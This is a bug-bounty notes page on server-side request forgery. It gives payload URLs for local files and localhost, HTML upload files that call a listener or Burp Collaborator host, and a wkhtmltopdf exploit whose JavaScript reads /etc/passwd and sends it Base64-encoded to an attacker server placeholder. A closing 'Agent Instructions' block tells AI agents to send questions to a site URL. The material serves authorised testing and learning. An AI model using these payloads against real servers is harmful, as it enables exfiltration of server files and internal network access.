# Server Side Request Forgery (SSRF)

## Basic SSRF payloads

```
file:///etc/passwd
http://127.0.0.1
http://127.0.0.1:5000
http://127.0.0.1:1
index.html
index.php
http::////127.0.0.1:1
```

## Blind SSRF

### HTML File Upload To SSRF

Make a html file with the following code

```html
<!DOCTYPE html>
<html>
<body>
	<a>Hello World!</a>
	<img src="http://<SERVICE IP>:PORT/x?=viaimgtag">
</body>
</html>
```

upload this file and see if you get a hit on netcat listener

<figure><img src="/files/Ho06nu1JqJRD23VW7H2d" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9WWUqywyNN2xzSDEBDqH" alt=""><figcaption></figcaption></figure>

I got a hit on my netcat listener

### Using Burp Collaborator

use the below code in html file

```html
<!DOCTYPE html>
<html>
<body>
	<a>Hello World!</a>
	<img src="http://oldac4hch7f4k2reoc7cyj3y7pdg17pw.oastify.com/x?=viaimgtag">
</body>
</html>
```

## wkhtmltopdf Blind SSRF Exploit

By inspecting the request, we notice `wkhtmltopdf` in the User-Agent. If we browse [wkhtmltopdf's downloads webpage](https://wkhtmltopdf.org/downloads.html), the below statement catches our attention:

Do not use wkhtmltopdf with any untrusted HTML – be sure to sanitize any user-supplied HTML/JS; otherwise, it can lead to the complete takeover of the server it is running on! Please read the project status for the gory details.

we can execute JavaScript in wkhtmltopdf! Let us leverage this functionality to read a local file by creating the following HTML document.

```html
<html>
    <body>
        <b>Exfiltration via Blind SSRF</b>
        <script>
        var readfile = new XMLHttpRequest(); // Read the local file
        var exfil = new XMLHttpRequest(); // Send the file to our server
        readfile.open("GET","file:///etc/passwd", true); 
        readfile.send();
        readfile.onload = function() {
            if (readfile.readyState === 4) {
                var url = 'http://<SERVICE IP>:<PORT>/?data='+btoa(this.response);
                exfil.open("GET", url, true);
                exfil.send();
            }
        }
        readfile.onerror = function(){document.write('<a>Oops!</a>');}
        </script>
     </body>
</html>
```

In this case, we are using two [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) objects, one for reading the local file and another one to send it to our server. Also, we are using the `btoa` function to send the data encoded in Base64.

<figure><img src="/files/KdhYRGezob3e2uIXsr2T" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.programmersecurity.com/bug-bounty/server-side-request-forgery-ssrf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.